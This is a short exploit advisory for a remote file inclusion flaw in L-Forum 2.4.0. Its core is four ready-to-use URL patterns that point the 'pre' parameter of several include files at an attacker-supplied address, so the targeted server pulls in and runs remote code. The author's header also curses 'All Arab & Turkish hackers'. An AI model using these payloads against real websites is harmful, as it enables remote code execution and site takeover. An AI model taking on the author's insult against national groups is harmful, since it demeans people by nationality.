Title: l-forum <= 2.4.0 Remote File Inclusion Vulnerability

```````````````````````````````````````````````````````````````````

The bug is Discovered by Minus-Power 
Mail: minus-power [at] myway [dot] com

Date: 19.Aug 2006
                   -=[ Republic of IRAN ]=-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thank you : R00T[ATI] - Stansar & members of RS
Damn to : All Arab & Turkish hackers
--------------------------------------------------------------------
Details:

+ Script name: L-Forum 2.4.0
+ Script url: http://sourceforge.net/projects/l-forum/

# Exp:

http://www.[WebSite].com/[Path to l-forum ]/inc/list_thr.inc?pre= [ ATTACKER ]
http://www.[WebSite].com/[Path to l-forum ]/inc/list_msgs.inc?pre= [ ATTACKER ]
http://www.[WebSite].com/[Path to l-forum ]/inc/list_mod.inc?pre= [ ATTACKER ]
http://www.[WebSite].com/[Path to l-forum ]/inc/list_last.inc?pre= [ ATTACKER ]